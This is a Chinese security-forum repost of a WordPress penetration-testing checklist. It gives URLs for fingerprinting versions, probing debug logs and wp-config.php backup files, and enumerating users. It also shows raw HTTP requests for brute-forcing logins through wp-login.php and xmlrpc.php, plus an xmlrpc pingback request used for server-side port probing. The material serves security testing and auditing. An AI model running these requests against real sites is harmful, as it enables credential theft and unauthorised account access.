安全矩阵

 找回密码
 立即注册
搜索
查看: 1077|回复: 0

干货 | Wordpress网站渗透方法指南

[复制链接]

260

主题

275

帖子

1065

积分

金牌会员

Rank: 6Rank: 6

积分
1065
发表于 2022-9-16 13:17:37 | 显示全部楼层 |阅读模式

干货 | Wordpress网站渗透方法指南
原文链接:干货 | Wordpress网站渗透方法指南
HACK学习 HACK学习呀 2022-09-13 12:35 发表于广东
如果您遇到使用 WordPress 的网站,您会怎么做,渗透思路和安全检测思路?

如何挖掘Wordpress网站的漏洞
如果您访问https://target.com并查看源代码,您将看到来自 WordPress 的主题和插件的链接。
或者你可以访问https://target.com/wp-login.php,它是 WordPress 登录管理页面
通过查看核心、插件和主题版本找到相关的CVE

如何找到wordpress版本
  1. https://target.com/feed
  2. https://target.com/?feed=rss2
复制代码

如何找到插件版本
  1. https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
  2. https://target.com/wp-content/plugins/PLUGINNAME/readme.TXT
  3. https://target.com/wp-content/plugins/PLUGINNAME/README.txt
  4. https://target.com/wp-content/plugins/PLUGINNAME/README.TXT
复制代码


如何找到主题版本
  1. https://target.com/wp-content/themes/THEMENAME/style.css
  2. https://target.com/wp-content/themes/THEMENAME/readme.txt (If they have readme file)
复制代码

如果您发现过时的核心/插件/主题,请在https://wpscan.com找到漏洞利用
查找日志文件
  1. http://target.com/wp-content/debug.log
复制代码

查找备份文件 wp-config
  1. http://target.com/.wp-config.php.swp
  2. http://target.com/wp-config.inc
  3. http://target.com/wp-config.old
  4. http://target.com/wp-config.txt
  5. http://target.com/wp-config.html
  6. http://target.com/wp-config.php.bak
  7. http://target.com/wp-config.php.dist
  8. http://target.com/wp-config.php.inc
  9. http://target.com/wp-config.php.old
  10. http://target.com/wp-config.php.save
  11. http://target.com/wp-config.php.swp
  12. http://target.com/wp-config.php.txt
  13. http://target.com/wp-config.php.zip
  14. http://target.com/wp-config.php.html
  15. http://target.com/wp-config.php~
复制代码

获取网站上的用户名
  1. http://target.com/?author=1
复制代码

或者
  1. http://target.com/wp-json/wp/v2/users
  2. http://target.com/?rest_route=/wp/v2/users
复制代码
爆破后台账号密码
  1. POST /wp-login.php HTTP/1.1
  2. Host: target.com
  3. log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
复制代码
或者
  1. POST /xmlrpc.php HTTP/1.1
  2. Host: target.com
  3. <?xml version="1.0" encoding="UTF-8"?>
  4. <methodCall>
  5. <methodName>wp.getUsersBlogs</methodName>
  6. <params>
  7. <param><value>admin</value></param>
  8. <param><value>BRUTEFORCE_IN_HERE</value></param>
  9. </params>
  10. </methodCall>
复制代码

wordpress 中的 XSPA
  1. POST /xmlrpc.php HTTP/1.1
  2. Host: target.com
  3. <methodCall>
  4. <methodName>pingback.ping</methodName>
  5. <params><param>
  6. <value><string>http://yourip:port</string></value>
  7. </param><param>
  8. <value>
  9. <string>https://target.com></string>
  10. </value>
  11. </param></params>
  12. </methodCall>
复制代码

注册启用
  1. http://example.com/wp-login.php?action=register
复制代码







回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-3-29 06:37 , Processed in 0.011907 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表